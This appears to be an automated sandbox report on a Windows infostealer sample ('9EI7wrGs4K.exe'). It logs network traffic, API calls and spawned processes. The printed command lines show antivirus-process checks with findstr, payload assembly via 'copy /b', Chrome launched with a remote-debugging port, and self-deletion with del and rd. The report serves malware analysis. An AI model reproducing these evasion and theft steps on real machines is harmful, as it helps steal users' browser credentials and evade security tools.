                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00B5F7C7
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B5F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00B5F55C
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B79FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00B79FD2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AFFFE0 CloseHandle,NtProtectVirtualMemory,10_2_00AFFFE0
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B54763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00B54763
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B41B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00B41B4D
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00B4F20D
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile created: C:\Windows\MpForgottenJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile created: C:\Windows\TabletActionJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile created: C:\Windows\CommunityProductionJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile created: C:\Windows\ExtractNicholasJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_0040737E0_2_0040737E
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_00406EFE0_2_00406EFE
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004079A20_2_004079A2
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004049A80_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B0801710_2_00B08017
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AEE1F010_2_00AEE1F0
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AFE14410_2_00AFE144
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE22AD10_2_00AE22AD
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B022A210_2_00B022A2
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1A26E10_2_00B1A26E
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AFC62410_2_00AFC624
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B6C8A410_2_00B6C8A4
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1E87F10_2_00B1E87F
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B16ADE10_2_00B16ADE
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B52A0510_2_00B52A05
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B48BFF10_2_00B48BFF
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AFCD7A10_2_00AFCD7A
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B0CE1010_2_00B0CE10
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B1715910_2_00B17159
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE924010_2_00AE9240
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B7531110_2_00B75311
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE96E010_2_00AE96E0
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B0170410_2_00B01704
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B01A7610_2_00B01A76
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B07B8B10_2_00B07B8B
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00AE9B6010_2_00AE9B60
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B07DBA10_2_00B07DBA
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B01D2010_2_00B01D20
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B01FE710_2_00B01FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\245347\Dry.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: String function: 00AFFD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: String function: 00B00DA0 appears 46 times
                Source: 9EI7wrGs4K.exeStatic PE information: invalid certificate
                Source: 9EI7wrGs4K.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/36@5/6
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B541FA GetLastError,FormatMessageW,10_2_00B541FA
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B42010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00B42010
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B41A0B AdjustTokenPrivileges,CloseHandle,10_2_00B41A0B
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B4DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00B4DD87
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 10_2_00B53A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00B53A0E
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\VPN9OH77.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6172:120:WilError_03
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile created: C:\Users\user\AppData\Local\Temp\nsv8BCF.tmpJump to behavior
                Source: 9EI7wrGs4K.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Q9RQQIMOZ.10.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 9EI7wrGs4K.exeReversingLabs: Detection: 21%
                Source: 9EI7wrGs4K.exeVirustotal: Detection: 18%
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeFile read: C:\Users\user\Desktop\9EI7wrGs4K.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\9EI7wrGs4K.exe "C:\Users\user\Desktop\9EI7wrGs4K.exe"
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting b
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com b
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move App App.cmd & App.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 245347Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "profiles" Organizing Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Judy + ..\Sheets + ..\Another + ..\Wanting bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\245347\Dry.com Dry.com bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\245347\Dry.com" & rd /s /q "C:\ProgramData\OHVS0RIMGLNY" & exitJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 --field-trial-handle=2436,i,2326185924159091694,5961255311856640227,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\9EI7wrGs4K.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comSection loaded: dbghelp.dllJump to behavior
